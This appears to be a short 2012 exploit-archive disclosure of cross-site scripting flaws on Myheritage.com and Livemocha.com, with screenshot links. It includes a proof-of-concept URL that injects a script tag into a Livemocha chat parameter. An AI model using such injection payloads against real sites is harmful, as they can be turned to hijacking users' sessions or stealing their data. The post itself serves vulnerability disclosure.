Home / exploits Myheritage.com / Livemocha.com Cross Site Scripting
Posted on 12 March 2012
# Date: 11.03.2012 # Author: Sony # Web Browser : Mozilla Firefox # Blog: http://st2tea.blogspot.com .................................................................. Social Networks. 5-10 minute with hands. Intersting place for cross site scripting. 1. Myheritage.com We have a multiple persistent cross site scripting vulnerabilities. I put only 2. http://www.myheritage.com/site-183672172/styles?popup=4%2C+5547469671#notificationPanelAnchor http://2.bp.blogspot.com/-s-nwU9rPqvU/T1zYNxFcRYI/AAAAAAAAAuQ/5MRuvBzrelY/s1600/meheritage1.JPG http://www.myheritage.com/family-1_1000001_183672172_183672172/nepit-private-nepit-private-nepit-born-nedjoli http://4.bp.blogspot.com/-mkS4ZvBayM0/T1zYUAbFsPI/AAAAAAAAAuc/-BfAQChoHwA/s1600/myheritage2.JPG 2. Livemocha.com We can see xss after login page. http://www.livemocha.com/userplane/frames?ext=html&is_src_user=true&strDestinationUserID=%22%22%3E%3Cscript%3Ealert%28%22hello%22%29%3C/script%3E&frameTarget=/userplane/wm (it's chat link) http://2.bp.blogspot.com/-x0_A6-iqYpM/T1zYoiup5PI/AAAAAAAAAuo/YPPqU-IjY5Q/s1600/livem.JPG
